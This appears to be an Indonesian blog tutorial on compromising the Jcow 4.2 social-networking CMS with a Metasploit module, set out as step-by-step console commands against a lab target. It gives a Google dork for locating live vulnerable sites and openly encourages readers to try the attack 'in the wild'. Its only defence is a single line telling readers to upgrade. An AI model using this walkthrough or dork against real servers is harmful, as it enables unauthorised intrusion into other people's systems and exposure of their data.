Hacking Jcow Social Networking Webserver

chmood
Apakah teman-teman pernah melihat CMS yang satu ini?

Β  Β  Jcow social networking…Ya, memang demikian namanya… Jcow menawarkan aplikasi berbasis web untuk situs jejaring sosial secara gratis alias free dan bisa dilihat di websitenya jcow.net dengan ukuran file yang cukup kecil hanya 777KB tidak lebih dari 1 MB.

Jcow

Tapi disini yang akan saya bahas bukanlah mengenai penggunaan dari si Jcow ini sebagai situs pertemanan, melainkan terdapatnya suatu vulnerability dari beberapa versi dari Jcow yang ternyata dapat disusupi hanya dalam 4 langkah , dan bahkan si penyusup dapat melihat isi direktori web server korban(jika ternyata servernya pun tidak menerapkan pengamanan yang baik).
Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94…
Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the wild arena, kawan-kawan juga bisa cari via google dork : β€œPowered by Jcow 4.2.0β€œ. Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internet(klik disini)
O.S Penyerang : BT 5 R1
O.S Korban : XP SP3
Aplikasi vulnerable : Jcow 4.2
Pada artikel ini juga saya sebelumnya sudah membuat username : β€œvictim dan password :”victim” pada aplikasi Jcow target.
Oke kita mulai langkah demi langkahnya dibawah ini
Kebutuhan :
1. Metasploit Framework (metasploit.com)
2. Script exploit jcow.rb (link mediafire di website asalnya)
Langkah-Langkahnya :
1. Copykan file exploit jcow.rb yang sudah di-download kedalam folder /pentest/exploits/framework/modules/exploits/remote/
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
Jika bingung bagaimana cara meng-copy kan file exploit.rb kedalam Backtrack Linux, kawan-kawan bisa lihat tutorialnya disini.
2. Buka metasploit console dengan mengetikkan msfconsole pada terminal, lalu gunakan exploit yang sebelumnya sudah kita copy tadi.
msf > use exploit/remote/jcow
3. Selanjutnya ketikkan perintah show options untuk melihat switch apa saja yang dapat digunakan untuk exploit ini.



msf exploit(jcow) > set rhost 192.168.8.94 –> target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim –> set username
username => victim
msf exploit(jcow) > set password victim –> set password
password => victim

4. Yep setelah semuanya selesai dikonfigurasi dengan baik, langkah terakhir tinggal menjalankan perintah exploit pada konsol metasploit.



Berhasil
Pengamanan :

1. Upgrade Jcow ke versi terbaru

Komentar